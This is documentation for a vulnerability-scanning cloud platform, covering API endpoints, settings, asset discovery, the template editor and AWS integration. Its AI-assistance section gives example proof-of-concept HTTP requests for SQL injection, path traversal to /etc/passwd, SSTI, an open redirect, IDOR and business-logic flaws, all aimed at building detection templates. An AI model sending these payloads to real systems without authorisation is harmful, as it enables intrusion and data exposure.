# Delete Asset
delete /v1/assets/{asset_Id}
Delete asset by ID
# Get Asset Content
get /v1/assets/{asset_id}/contents
Get user asset content
# Get Asset Metadata
get /v1/assets/{asset_Id}
Get asset metadata
# Update Asset Content
patch /v1/assets/{asset_id}/contents
Update existing asset content
# Upload Asset
post /v1/assets
Manually upload user assets (uploaded to manual enumeration)
# Add Config
post /v1/scans/config
Add a new scan configuration
# Add excluded templates
post /v1/scans/config/exclude
Add excluded templates
# Delete Config
delete /v1/scans/config/{config_id}
Delete scan configuration
# Delete excluded template ids
delete /v1/scans/config/exclude
Delete excluded template ids
# Get Config
get /v1/scans/config/{config_id}
Get a scan configuration
# Get Configs List
get /v1/scans/config
Get user scan configurations list
# Get excluded templates
get /v1/scans/config/exclude
Get excluded templates
# Update Config
patch /v1/scans/config/{config_id}
Update existing scan configuration
# Get elogs of given scan id
get /v1/scans/{scan_id}/error_log
# Create Enumeration
post /v1/asset/enumerate
Create a new enumeration
# Delete Bulk Enumeration
delete /v1/asset/enumerate
Delete enumeration by enumerate ids
# Delete Enumeration
delete /v1/asset/enumerate/{enumerate_id}
Delete enumeration by enumerate_id
# Delete Enumeration Schedule
delete /v1/enumeration/schedule
Delete a re-scan schedule
# Export Enumeration
get /v1/asset/enumerate/{enum_id}/export
Export enumeration content
# Export Enumeration of user
get /v1/asset/enumerate/export
Export enumeration content
# Get All Enumeration Contents
get /v1/asset/enumerate/contents
Get All enumeration content
# Get all enumeration stats
get /v1/asset/enumerate/stats
# Get Enumeration
get /v1/asset/enumerate/{enumerate_id}
Get enumeration by enumerate_id
# Get enumeration config
get /v1/asset/enumerate/{enumerate_id}/config
# Get Enumeration Contents
get /v1/asset/enumerate/{enumerate_id}/contents
Get enumeration content by enumerate_id
# Get Enumeration List
get /v1/asset/enumerate
Get enumeration list
# Get Enumeration Schedules
get /v1/enumeration/schedule
Get enumeration re-scan schedule
# Get enumeration stats
get /v1/asset/enumerate/{enumerate_id}/stats
# Group assets by filters
get /v1/asset/enumerate/filters
# Group assets by filters for an enumeration
get /v1/asset/enumerate/{enumerate_id}/filters
# Rescan Enumeration
post /v1/asset/enumerate/{enumerate_id}/rescan
Re-run a existing enumeration
# Set Enumeration Schedule
post /v1/enumeration/schedule
Set enumeration re-scan frequency
# Stop Enumeration
post /v1/asset/enumerate/{enumerate_id}/stop
Stop a running enumeration
# Update Enumeration
patch /v1/asset/enumerate/{enumerate_id}
Update enumeration by enumerate_id
# Get audit logs for team
get /v1/team/audit_log
# Cloud API Reference Introduction
Details on the ProjectDiscovery Cloud Platform API
## Overview
The ProjectDiscovery Cloud Platform API v1 is organized around [REST](http://en.wikipedia.org/wiki/Representational_State_Transfer). Our API has resource-oriented URLs, accepts and returns JSON in most cases, and the API uses standard HTTP response codes, authentication, and verbs. Our API also conforms to the [OpenAPI Specification](https://www.openapis.org/).
This API documentation will walk you through each of the available resources, and provides code examples for `cURL`, `Python`, `JavaScript`, `PHP`, `Go` and `Java`. Each endpoint includes the required authorization information and parameters, and provides examples of the response you should expect.
## Authentication
The ProjectDiscovery Cloud Platform API uses API keys to authenticate requests. You can view and manage your API key in ProjectDiscovery Cloud Platform at [https://cloud.projectdiscovery.io/](https://cloud.projectdiscovery.io/) under your user information.
Authentication with the API is performed using a custom request header - `X-Api-Key` - which should simply be the value of your API key found with your ProjectDiscovery Cloud Platform account.
You must make all API calls over `HTTPS`. Calls made over plain HTTP will fail, as will requests without authentication or without all required parameters.
## Resources
Below (and in the menu on the left) you can find the various resources available to the ProjectDiscovery Cloud Platform API.
Your assets (hosts, CIDR ranges, etc.) for scanning.
Access public and private templates as well as AI template creation.
Manage scans, scan schedules, and create new scans.
See and manage vulnerabilities detected by PDCP.
Retest vulnerabilities or run single template/target scans.
See and manage user settings, API keys and more.
# Get All Results
get /v1/scans/results
Get scans results of a user
# Get Results Stats
get /v1/scans/results/stats
Get user scan results stats
# Get Scan Results
get /v1/scans/result/{scanId}
get results of specific scan by id
# Get Scan Vulnerability
get /v1/scans/vuln/{vuln_id}
Get scan result vulnerability by ID
# Get Scans Result Filters
get /v1/scans/results/filters
Get users scan-result filters
# Get scan log of given scan id
get /v1/scans/{scan_id}/scan_log
# Create Scan
post /v1/scans
Trigger a scan
# Create vulns export to tracker
post /v1/scans/vulns/{vuln_id}/ticket
Create vulns export to tracker
# Delete Scan
delete /v1/scans/{scan_id}
Delete a scan using scanId
# Delete Bulk Scans
delete /v1/scans
Delete multiple scans using scan ids
# Delete Scan Schedule
delete /v1/scans/schedule
Delete scan schedule for a user
# Delete Scan Vulnerability
delete /v1/scans/vulns
Batch Delete scan vulnerability
# Export Filtered Scan
post /v1/scans/{scan_id}/export
Export filtered scan results
# Export Scan
get /v1/scans/{scan_id}/export
Export scan results
# Export Scan Vulnerability
get /v1/scans/vuln/{vuln_id}/export
Export a specific scan vulnerability
# Get All Scan Stats
get /v1/scans/stats
Get all scans statistics for a user
# Get All Scans History
get /v1/scans/history
Get user scan history details
# Get Scan
get /v1/scans/{scan_id}
Get details of a scan by scan ID
# Get Scan Config
get /v1/scans/{scan_id}/config
Get scan metadata config
# Get Scan History
get /v1/scans/{scanId}/history
Get scan history detial by scanId
# Get Scan IPs
get /v1/scans/scan_ips
Get list of static IPs used for scan
# Get Scan List
get /v1/scans
Get user scans status
# Get Scan Schedules
get /v1/scans/schedule
Get scan schedules for a user
# Get Scans Token
get /v1/scans/token
Get user scan token usage details
# Import OSS Scan
post /v1/scans/import
Import scan details
# Rescan scan
post /v1/scans/{scan_id}/rescan
Re-run a existing scan
# Retest vulnerability
post /v1/scans/{vuln_id}/retest
Retest a scan vulnerability
# Set Scan Schedule
post /v1/scans/schedule
set a scan schedule for a user
# Stop Scan
post /v1/scans/{scan_id}/stop
Stop a running scan, not applied in any other state.
# Update Imported Scan
patch /v1/scans/{scan_id}/import
Import more results to a given scan
# Update Scan
patch /v1/scans/{scan_id}
Update scan metadata
# Update Scan Config
patch /v1/scans/{scan_id}/config
Update scan metadata config
# Update Vulnerability Labels
patch /v1/scans/vulns/labels
Batch update vulnerability labels
# Update Vulnerability Status
patch /v1/scans/vulns
Batch update vulnerability status
# Create Template
post /v1/template
Create a private template
# Delete Template
delete /v1/template/{template_id}
Delete private template using ID
# Generate AI Template
post /v1/template/ai
Generate a private template with AI Engine
# Get Early Template
get /v1/template/early/{id}
Get early template text
# Get Early Template List
get /v1/template/early
Get pdcp early template lists
# Get Github Template
get /v1/template/github/{id}
Get github template text
# Get Github Template List
get /v1/template/github
List of all user's github templates
# Get Public Template
get /v1/template/public/*
Get public template text using path
# Get Public Template List
get /v1/template/public
Get public-template list
# Get Public Template Stats
get /v1/template/stats
Get public template statistics
# Get Share Status
get /v1/template/share
Get template sahred status (shared-with-link)
# Get Shared Template
get /v1/template/share/{template_id}
Get a shared template text
# Get Template
get /v1/template/{template_id}
Get private template text using ID
# Get Template List
get /v1/template
Get user private(my) templates
# Share Template
post /v1/template/share
Share a private template (shared-with-link)
# Update Template
patch /v1/template
Update existing private template
# Update enumeration config
patch /v1/asset/enumerate/{enumerate_id}/config
# Create API Key
post /v1/user/apikey
Create user api-key, this won't create a new api-key if it already exists.
# Delete API Key
delete /v1/user/apikey
Delete user api-key
# Get API Key
get /v1/user/apikey
Get user api-key
# Get User Profile
get /v1/user
Get user profile and permissions
# Rotate API Key
post /v1/user/apikey/rotate
Rotate user api-key
# ProjectDiscovery Cloud Platform Settings & Administration
Review administrative, team, and account settings
## Summary
This guide covers general account administration under settings in the ProjectDiscovery Cloud Platform (PDCP). These administrative and system settings include details about your account, team settings for administrators, and password/2FA.
If you have questions about settings that are not covered here, or functionality that you think would be helpful - [get in touch.](/help)
For details on other settings check out the guides for those features.
* [Scanning](/cloud/scanning/overview)
* [Assets](/cloud/assets/overview)
* [Templates](/cloud/editor/overview)
## Settings
[Profile settings](https://cloud.projectdiscovery.io/settings) are available from the global navigation under your sign-in (top right) for access to your Profile, Team, Scan IPs and more.
## Profile
Profile displays your username, email address, and the option to delete your account.
*Note: The ability to update these profile components will be available in a future release.*
## Team
Under **Settings → Team** all users can view team settings. Users with the appropriate permissions can also modify team settings and manage team members.
View or update team names, manage team members, and delete teams (supported for team owners)
* Use **Create Team** to create a new team (up to 2 for Pro Tier).
* Modify team settings by selecting a team from the global navigation.
To modify team settings select a team from the global navigation to display those team settings.
### User Types
ProjectDiscovery Cloud Platform supports four types of users with the following permissions:
* Owner: Read, write, invite, billing
* Admin: Read, write, invite
* Member: Read, write
* Viewer: Read
### Managing Teams
Teams can be created by Pro and Custom tier users. A Pro subscription supports up to two teams with 10 members. For a larger quantity of teams, or a greater number of members get in touch about a Custom tier configuration.
## Scan IPs
Add Static IPs for greater control over your infrastructure scanning.
## Billing
Purchase, view, or modify your subscription. A subscription to our Pro tier starts at \$250/month for scanning of up to 1000 unique assets.
Additional upgrade options are also available with higher monthly asset limits - reach out to us with any questions about a custom contract.
## Security (Account Security)
Use Security to update your password or to enable 2-factor authentication.
* **Password** creates an account password that provides a login with your email (username) and password, as an alternative to using a linked account for login. These credentials will not replace any existing login configurations (for example:GitHub)
* **Two-step authentication** provides additional authentication for your account with an authenticator application.
# Assets in PDCP
Adding and managing Assets in ProjectDiscovery Cloud Platform
## Summary
Assets are any hosts added to ProjectDiscovery Cloud Platform (PDCP) for scanning. Hosts can be a URL, an IP address, or a CIDR range.
Assets can be added through either the Assets tab, or during the creation of a scan. Regardless of the path, adding assets to the Cloud Platform is the first step to running a scan and securing your tech stack against exploitable vulnerabilities.
From the Assets tab, there are three methods to add your assets:
* Add New Assets
* Connect Cloud Services
* HttpX Integration
Each unique path, including those with specified ports will be added as an individual asset for scanning. If you have questions about your specific setup, get in touch with us at [support@projectdiscovery.io](mailto:support@projectdiscovery.io).
## Discover New Assets
Discovery is the easiest method of importing assets into PDCP for vulnerability scanning.
* **Scope**: manually input your list of up to 10 root domains in the Free plan, or up to 100 root domains in Pro.
* Auto Discovery is enabled by default and will automatically discover your assets including subdomains, open ports, and other web technologies. Port scanning and technology detection is available in Pro and Enterprise plans only.
* *Note: Disable Auto Discovery to restrict upload to your specified asset list.*
* Domain, IP address, or CIDR. For CIDR ranges each individual IP will be added as a single asset.
* **Advanced**: Turning off Auto Discovery disables all discovery settings.
* Use Advanced to modify individual discovery settings for subdomains, open ports, etc.
* Customize the frequency of Auto Discovery to continuously monitor for new assets.
Check out [What is exposed?](/cloud/examples/addassets) for an example of adding assets for Discovery or Cloud Integration.
## Connect Cloud Services
The **Connect Cloud Services** option connects your PDCP environment to any of our supported cloud providers and pull in assets once configured.
Cloud connections can be configured to check for updates to your assets and ensure your information is up to date.
For the majority of integrations, you only need to provide a name and the token or access details generated by the provider.
## HttpX Integration
See HttpX Integration [docs](https://docs.projectdiscovery.io/tools/httpx/running#ui-dashboard-pdcp-integration) and [blog](https://blog.projectdiscovery.io/introducing-httpx-dashboard-2/) for more details.
## Managing Assets
Once your assets are added successfully they display in the asset list.
* Use the context menu to rename, **Update** to add or remove assets, Re-Discover, or Delete.
* Uploaded assets are immediately available to use in scans.
* Assets that are part of an existing scan cannot be deleted.
# ProjectDiscovery Cloud Platform Assets
A high-level overview of the PDCP Asset functionality
## Overview
In the ProjectDiscovery Cloud Platform (PDCP), an asset is any host or target for vulnerability scanning. An asset is defined as the combination of a host (subdomain or IP address) and a specific port.
Assets can be discovered via Auto-Discovery from a root domain or specified IP/CIDR range. Note: IP and CIDR range discovery and enrichment are only available on Pro and Enterprise plans.
Assets can also be imported through our cloud integrations or direct upload through a .txt file.
Once assets are added to PDCP, they can be selected as targets in a vulnerability scan.
![Assets](https://mintlify.s3-us-west-1.amazonaws.com/projectdiscovery/images/platform/assetspage.png)
## FAQ
### General
**Is there a limitation to how many root domains I can run auto-discovery on?**
The Free tier supports up to 10 root domain discoveries per month, while Pro supports 100 domains per month and Enterprise offers custom limits.
**What kind of Assets are supported?**
Assets or hosts can be a URL, an IP address, a root domain, or a CIDR range.
**Can everyone in my team see all the Assets that were added to my environment?**
Yes, all assets in your environment are shared across your team.
### Assets and Scans
**Can I exempt specific assets from a scan?**
Building a new scan requires you to choose assets as part of the scan configuration, so yes, scans will apply to whatever assets you include in the scan.
### Adding and Modifying Assets
**What's the difference between Add Assets, cloud integration?**
* Add allows you to choose a list of individual assets or root domains to add as a list or TXT file.
* Enabling **Auto Discovery** automatically enumerates associated subdomains and open ports. Each subdomain or unique path identified is added as individual asset.
* Cloud Integrations connect your cloud service provider and import any assets identified.
**Can I edit existing Assets?**
Yes! Assets that are added to PDCP can be renamed.
**Can I delete Assets?**
You can delete any assets, however assets that are included in a scan will generate an error.
# AI Assistance
Review details on using AI to help generate templates for Nuclei and PDCP
[The Template Editor](https://cloud.projectdiscovery.io/) has AI to generate templates for vulnerability reports. This document helps to guide you through the process, offering usagwe tips and examples.
## Overview
Powered by ProjectDiscovery's deep library of public Nuclei templates and a rich CVE data set, the AI understands a broad array of security vulnerabilities. First, the system interprets the user's prompt to identify a specific vulnerability. Then, it generates a template based on the steps required to reproduce the vulnerability along with all the necessary meta information to reproduce and remediate.
## Initial Setup
Kick start your AI Assistance experience with these steps:
1. **Provide Detailed Information**: Construct comprehensive Proof of Concepts (PoCs) for vulnerabilities like Cross-Site Scripting (XSS), and others.
2. **Understand the Template Format**: Get to grips with the format to appropriately handle and modify the generated template.
3. **Validation and Linting**: Use the integrated linter to guarantee the template's validity.
4. **Test the Template**: Evaluate the template against a test target ensuring its accuracy.
## Best Practices
* **Precision Matters**: Detailed prompts yield superior templates.
* **Review and Validate**: Consistently check matchers' accuracy.
* **Template Verification**: Validate the template on known vulnerable targets before deployment.
## Example Prompts
The following examples demonstrate different vulnerabilities and the corresponding Prompt.
Open redirect vulnerability identified in a web application. Here's the PoC:
HTTP Request:
```
GET /redirect?url=http://malicious.com HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
```
HTTP Response:
```
HTTP/1.1 302 Found
Location: http://malicious.com
Content-Length: 0
Server: Apache
```
The application redirects the user to the URL specified in the url parameter, leading to an open redirect vulnerability.
SQL Injection vulnerability in a login form. Here's the PoC:
HTTP Request:
```
POST /login HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
username=admin&password=' OR '1'='1
```
HTTP Response:
```
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 1337
Server: Apache
...
Welcome back, admin
...
```
The application improperly handles user input in the password field, leading to an SQL Injection vulnerability.
Business Logic vulnerability in a web application's shopping cart function allows for negative quantities, leading to credit. Here's the PoC:
HTTP Request:
```
POST /add-to-cart HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
product_id=1001&quantity=-1
```
HTTP Response:
```
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 1337
Server: Apache
...
Product added to cart. Current balance: -$19.99
...
```
The application fails to validate the quantity parameter, resulting in a Business Logic vulnerability.
Server-side Template Injection (SSTI) vulnerability through a web application's custom greeting card function. Here's the PoC:
```
HTTP Request:
POST /create-card HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
message={{7*7}}
```
```
HTTP Response:
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 1337
Server: Apache
...
Your card: 49
...
```
The application processes the message parameter as a template, leading to an SSTI vulnerability.
Insecure Direct Object Reference (IDOR) vulnerability discovered in a website's user profile page. Here's the PoC:
```
HTTP Request:
GET /profile?id=2 HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Cookie: session=abcd1234
```
```
HTTP Response:
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 1337
Server: Apache
...
Welcome, otheruser
...
```
The application exposes sensitive information of a user (ID: 2) who is not the authenticated user (session: abcd1234), leading to an IDOR vulnerability.
Path Traversal vulnerability identified in a web application's file download function. Here's the PoC:
```
HTTP Request:
GET /download?file=../../etc/passwd HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
```
```
HTTP Response:
HTTP/1.1 200 OK
Content-Type: text/plain
Content-Length: 1827
Server: Apache
root:x:0:0:root:/root:/bin/bash
```
The application fetches the file specified in the file parameter from the server file system, leading to a Path Traversal vulnerability.
Business logic vulnerability in a web application's VIP subscription function allows users to extend the trial period indefinitely. Here's the PoC:
```
HTTP Request:
POST /extend-trial HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Cookie: session=abcd1234
```
```
HTTP Response:
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 1337
Server: Apache
Your VIP trial period has been extended by 7 days.
```
The application does not limit the number of times the trial period can be extended, leading to a business logic vulnerability.
Each of these examples provides HTTP Requests and Responses to illustrate the vulnerabilities.
## Limitations
Please note that the current AI is trained primarily on HTTP data. Template generation for non-HTTP protocols is not supported at this time. Support for additional protocols is under development and will be available soon.
# Templates & Editor FAQ
Answers to common questions about Nuclei templates and our cloud platform template editor
Nuclei [templates](http://github.com/projectdiscovery/nuclei-templates) are the core of the Nuclei project and ProjectDiscovery Cloud Platform. The templates contain the actual logic that is executed in order to detect various vulnerabilities.
The ProjectDiscovery template library contains **several thousand** ready-to-use **[community-contributed](https://github.com/projectdiscovery/nuclei-templates/graphs/contributors)** vulnerability templates. We are continuously working with our open source community
to update and add templates as vulnerabilities are discovered.
We maintain a [template guide](/templates/introduction/) for writing new and
custom Nuclei templates. ProjectDiscovery Cloud Platform also provides AI
support to assist in writing and testing custom templates. - Check out our
documentation on the [Templates Editor](/cloud/editor/ai) for more
information.
Performing security assessment of an application is time-consuming. It's always better and time-saving to automate steps whenever possible. Once you've found a security vulnerability, you can prepare a Nuclei template by defining the required HTTP request to reproduce the issue, and test the same vulnerability across multiple hosts with ease.
It's worth mentioning ==you write the template once and use it forever==, as you don't need to manually test that specific vulnerability any longer.
Here are few examples from the community making use of templates to automate the security findings:
* [https://dhiyaneshgeek.github.io/web/security/2021/02/19/exploiting-out-of-band-xxe/](https://dhiyaneshgeek.github.io/web/security/2021/02/19/exploiting-out-of-band-xxe/)
* [https://blog.melbadry9.xyz/fuzzing/nuclei-cache-poisoning](https://blog.melbadry9.xyz/fuzzing/nuclei-cache-poisoning)
* [https://blog.melbadry9.xyz/dangling-dns/xyz-services/ddns-worksites](https://blog.melbadry9.xyz/dangling-dns/xyz-services/ddns-worksites)
* [https://blog.melbadry9.xyz/dangling-dns/aws/ddns-ec2-current-state](https://blog.melbadry9.xyz/dangling-dns/aws/ddns-ec2-current-state)
* [https://projectdiscovery.io/blog/if-youre-not-writing-custom-nuclei-templates-youre-missing-out](https://projectdiscovery.io/blog/if-youre-not-writing-custom-nuclei-templates-youre-missing-out)
* [https://projectdiscovery.io/blog/the-power-of-nuclei-templates-a-universal-language-of-vulnerabilities](https://projectdiscovery.io/blog/the-power-of-nuclei-templates-a-universal-language-of-vulnerabilities)
Nuclei templates are selected as part of any scans you create. You can select pre-configured groups of templates, individual templates, or add your own custom templates as part of your scan configuration.
* Check out [the scanning documentation]('/cloud/scanning/overview') to learn more.
You are always welcome to share your templates with the community. You can
either open a [GitHub
issue](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=\&labels=nuclei-template\&template=submit-template.md\&title=%5Bnuclei-template%5D+template-name)
with the template details or open a GitHub [pull
request](https://github.com/projectdiscovery/nuclei-templates/pulls) with your
Nuclei templates. If you don't have a GitHub account, you can also make use of
the [discord server](https://discord.gg/projectdiscovery) to share the
template with us.
You own any templates generated by the AI through the Template Editor. They
are your property, and you are granted a perpetual license to use and modify
them as you see fit.
The Template Editor feature in PDCP uses OpenAI.
Yes, prompts are stored as part of the generated template metadata. This data
is deleted as soon as the template or the user are deleted.
The accuracy of the generated templates is primarily dependent on the detail
and specificity of the input you provide. The more detailed information you
supply, the better the AI can understand the context and create an accurate
template. However, as with any AI tool, it is highly recommended to review,
validate, and test any generated templates before using them in a live
environment.
No, AI does not use the templates you generate for further training or
improvement of the AI model. The system only uses public templates and CVE
data for training, ensuring your unique templates remain confidential.
# Template Editor Overview
Learn more about using the Nuclei Templates Editor
For more in-depth information about Nuclei templates, including details on template structure and supported protocols [check out](/templates/introduction).
[The Template Editor](https://cloud.projectdiscovery.io) is a multi-functional cloud-hosted tool designed for creating, running, and sharing templates (Nuclei and ProjectDiscovery Cloud Platform). It's packed with helpful features for individual and professional users seeking to manage and execute templates.
![Templates Editor](https://mintlify.s3-us-west-1.amazonaws.com/projectdiscovery/images/editor.jpg)
## Template Compatibility
In addition to the Template Editor, ProjectDiscovery Cloud Platform(PDCP) supports any templates compatible with [Nuclei](nuclei/overview). These templates are exactly the same powerful YAML format supported in open source.
Take a look at our [Templates](/Templates/introduction) documentation for a wealth of resources available around template design, structure, and how they can be customized to meet an enormous range of use cases. As always, if you have questions [we're here to help](/help/home).
## Features
Current and upcoming features:
| Feature | Description and Use | Availability |
| -------------------------- | --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ------------ |
| **Editor** | Experience something akin to using VS Code with our integrated editor, built on top of Monaco. This feature allows easy writing and modification of Nuclei Templates. | Free |
| **Optimizer** | Leverage the in-built TemplateMan API to automatically lint, format, validate, and enhance your Nuclei Templates. | Free |
| **Scan (URL)** | Run your templates on a targeted URL to check their validity. | Free \* |
| **Debugger** | Utilize the in-built debugging function that displays requests and responses of your template scans, aiding troubleshooting and understanding template behavior. | Free |
| **Cloud Storage** | Store and access your Nuclei Templates securely anytime, anywhere using your account. | Free |
| **Sharing** | Share your templates for better collaboration by generating untraceable unique links. | Free |
| **AI Assistance** | Employ AI to craft Nuclei Templates based on the context of specified vulnerabilities. This feature simplifies template creation and tailors them to minimize the time required for creation. | Free \* |
| **Scan (LIST, CIDR, ASN)** | In the professional version, run scans on target lists, network ranges (CIDR), AS numbers (ASN). | Teams |
| **REST API** | In the professional version, fetch templates, call the AI, and perform scans remotely using APIs. | Teams |
| **PDCP Sync** | Sync your generated templates with the ProjectDiscovery Cloud Platform for easy access and management, available in the professional version. | Teams |
## Free Feature Limitations
Some features available within the free tier have usage caps in place:
* **Scan (URL):** You're allowed up to **100** scans daily.
* **AI Assistance:** Up to **10** queries can be made each day.
The limitations, reset daily, ensure system integrity and availability while providing access to key functions.
## How to Get Started
Begin by ensuring you have an account. If not, sign up on [https://cloud.projectdiscovery.io](https://cloud.projectdiscovery.io/) and follow the steps below:
1. Log in to your account at [https://cloud.projectdiscovery.io](https://cloud.projectdiscovery.io).
2. Click on the "**Create new template**" button to open up a fresh editor.
3. Write and modify your template. The editor includes tools like syntax highlighting, snippet suggestions, and other features to simplify the process.
4. After writing your template, input your testing target and click the "**Scan**" button to authenticate your template's accuracy.
# Recommended
Learn more about using Recommended Templates in PDCP (Teams)
The functionality described on this page is **only** available through
[ProjectDiscovery Cloud Platform Teams](https://projectdiscovery.io/pricing).
## Overview
When setting up a scan in ProjectDiscovery Cloud Platform (PDCP) you have the option to build your scan using custom templates, [all templates](https://github.com/projectdiscovery/nuclei-templates), or recommended templates.
**Recommended templates are a curated subset of the full template library designed for efficiently scanning your attack surface.**
This subset of templates, nearly 4000 in total, focuses on relevant and exploitable vulnerabilities, excluding informational templates and templates with the potential to generate false positives.
The curated set of Recommended templates is available as a config file and can be viewed in the Nuclei repository - [Recommended Templates](https://github.com/projectdiscovery/nuclei-templates/blob/main/config/recommended.yml), or withing the application.
Rather than a list, PDCP's Recommended templates are curated through defined filters.
*This approach ensures that the curated list remains up-to-date as new templates are added.*
Filtering for Recommended templates includes:
* All template severities except info
* Type: http, tcp, or javascript
* Exclusion of the tags: tech, dos, fuzz, creds-stuffing, token-spray, osint
* Exclusion of specific templates the list is available for review here --> [Recommended Templates](https://github.com/projectdiscovery/nuclei-templates/blob/main/config/recommended.yml)
If you have questions, reach out to us through [support@projectdiscovery.io](mailto:support@projectdiscovery.io).
# Template Sharing
Learn about sharing templates
The Template Editor offers the ability to share any public templates, including the ones you create.
To share a template, click on the "Share" button to generate a link that can be sent to others.
## How to Share Public Templates
Public templates are designed for ease of sharing. You don't need to be authenticated to share them, meaning there's no need to log in. These templates are mapped with their Template ID, following a static URL pattern. For instance, a public template URL might resemble this: [https://cloud.projectdiscovery.io/public/CVE-2023-35078](https://cloud.projectdiscovery.io/public/CVE-2023-35078). In the given URL, `CVE-2023-35078` is the Template ID representing the template in the [nuclei-templates](https://github.com/projectdiscovery/nuclei-templates) project.
## How to Share User Templates
User templates, unlike public templates, require authentication for sharing. These templates are assigned a unique, UUID-based ID similar to YouTube's unlisted URLs for sharing purposes. This means anyone given the shared URL will be able to access the template.
## Revoking Access to Shared Templates
If at any point you want to limit the access to the shared template, it is as simple as changing the visibility of the template to private. After this change, the originally shared link will become inactive. However, you have the flexibility to share it again, which would generate a new unique ID.
Please remember, while sharing is easy, it's important to distribute the URL cautiously as the link allows full access to the shared template.
# Editor Keyboard Shortcuts
Review keyboard shortcuts for Nuclei templates
The Template Editor is equipped with keyboard shortcuts to make it more efficient. You can use these shortcuts whether you're creating a new template or optimizing an existing one, enabling quicker actions without interfering with your workflow.
Here is a list of the actions, along with their corresponding shortcut keys and descriptions:
| **Action** | **Shortcut Key** | **Description** |
| --------------------- | ----------------------- | ------------------------------------------------------------ |
| Save Template | **CMD + S** | Saves the current template. |
| Duplicate Template | **CMD + D** | Creates a copy of a public template. |
| Execute Template | **CMD + SHIFT + SPACE** | Run a scan with the current template. |
| Share Template Link | **ALT + SHIFT + SPACE** | Generates a URL for sharing the current template. |
| Search Templates | **CMD + K** | Searches within your own templates. |
| Copy Template | **CMD + SHIFT + C** | Copies the selected template to your clipboard. |
| Show/Hide Side Bar | **CMD + B** | Toggles the visibility of the side bar. |
| Show/Hide Debug Panel | **CMD + SHIFT + M** | Toggles the visibility of the debug panel for extra insight. |
For Mac users, the CMD key is used for these shortcuts.
Non-Mac users (Windows and Linux) should use the CTRL key instead.
# What is exposed?
Add Assets to identify where your tech stack is exposed to the internet?
## Summary
Walk through the steps you need to identify the assets in your environment that you want to protect.
For organizations that have visibility into their technical stack or inventory, you can easily upload a list of assets to the Cloud platform or use this [API endpoint.](https://docs.projectdiscovery.io/api-reference/assets/upload-asset)
For users that do not have a full list of assets we have two options:
* **Add Assets with Auto Discovery** - This is the simplest approach for a quick understanding of your exposed assets. Auto Discovery is supported by multiple open source ProjectDiscovery tools to find subdomains, ports, and endpoints that are exposed on the internet.
* *Note: We are actively building this feature. Discovery will continue to expand and improve to reflect the robust scope found in our open source tools.*
* **Integrate Cloud Services** - This feature supports numerous cloud service providers (AWS,GCP, Azure, CloudFlare, Fastly, and others). Once integration is configured the Cloud Platform polls the configured cloud service provider to continuously update
for any changes made by your team.
## Add Assets for
### Add a Cloud Integration
Navigate to [https://cloud.projectdiscovery.io/assets](https://cloud.projectdiscovery.io/assets)
Choose **Integrate Cloud Services** to show the full list of supported cloud services providers.
Select from the available cloud service providers, click **Connect** and provide the configuration details.
Select **Verify** to complete the configuration and get the Cloud Platform started on discovering your assets.
### Add New Assets with Auto Discovery
Navigate to [https://cloud.projectdiscovery.io/assets](https://cloud.projectdiscovery.io/assets)
Choose **Add New Assets** to open the asset workflow.
Add your Assets as root domains, IPs, or CIDR ranges you want to enumerate.
* You can add up to 50,000 individual hosts or 50 root domains.
* Click the **Advanced** tab to manually update the Auto Discovery Settings, and select a schedule.
Select **Add Assets** to complete the configuration and get the Cloud Platform started on discovering your assets.
With a Cloud Integration or Assets including Auto Discovery, you are now set up to ensure that the assets you added are maintained and up to date for scanning.
## What's Next?
Now that you've defined the Assets you want to include on the Cloud Platform you can move on to building your scans to detect vulnerabilities.
* Review [scanning basics](/cloud/scanning/overview)
* Explore [continuous scanning](/cloud/examples/continuousscan)
* Set up [custom automation](/cloud/examples/customautomation)
# Add Assets from your Cloud
Add Cloud Assets with Asset Discovery to track new resources
## Summary
For many organizations it's challenging to keep track of new assets across your cloud infrastructure.
In this example, we will walk through setting up ProjectDiscovery Cloud Platform (PDCP) to add assets from a Cloud Service Provider (AWS) with asset discovery enabled,
to ensure that as your infrastructure changes, your attack surface scanning can remain up to date.
### What you'll do
In this walkthrough we're going to go step-by-step through the process and complete the following actions:
* Collecting the data you need from your Cloud Service Provider
* Adding those details to PDCP to bring in your assets from the Cloud Provider
For this example we're going to walk through collecting the details you need from Amazon Web Services. Stay tuned for details on the other Cloud Service Providers we support
## Collect your AWS details
Make sure you have the appropriate access in AWS for gathering the requirements for this example. You will be creating and collecting your AWS Access Key and AWS Secret Key for the target resources.
### Prerequisites
* **Important note**: The identity (role) used to create the required AWS Key must have read-only access to the target resource(s)
* For information on creating AWS Keys - [refer to the AWS Managing Key documentation.](https://docs.aws.amazon.com/kms/latest/developerguide/create-keys.html)
* As a best practice, we recommend creating a new identity/role to use exclusively with ProjectDiscovery Cloud Platform.
* The AWS Session Token is not a mandatory requirement, however if your organization uses Session policies, these are typically implemented for more granular permission management.
* Refer to [AWS documentation on Session Policies.](https://docs.aws.amazon.com/IAM/latest/UserGuide/access_policies.html#policies_session)
### Steps in AWS
In this example we' re going to assume that you want to create a new user for PDCP to monitor a specific S3 bucket for assets to add to for scanning.
1. Log in to your [AWS Management Console.](https://aws.amazon.com/console/)
2. Navigate to IAM (Identity and Access Management), and select **IAM** from the services menu.
3. Select **Users** from navigation and **Create User**.
* Provide the user with a name that will make it easy to identify in PDCP
* Enable access to the AWS Management Console (*Optional*)
4. **Assign permissions** to the new user.
* This user will require **read only access** to the resources that you need to scan.
* We recommend that you implement the AWS read-only policies that provide access to EC2, Route53, and S3. This ensures that new resources added to the target services will be available to PDCP Asset discovered.
* For example in S3 the following policy should be selected and applied.
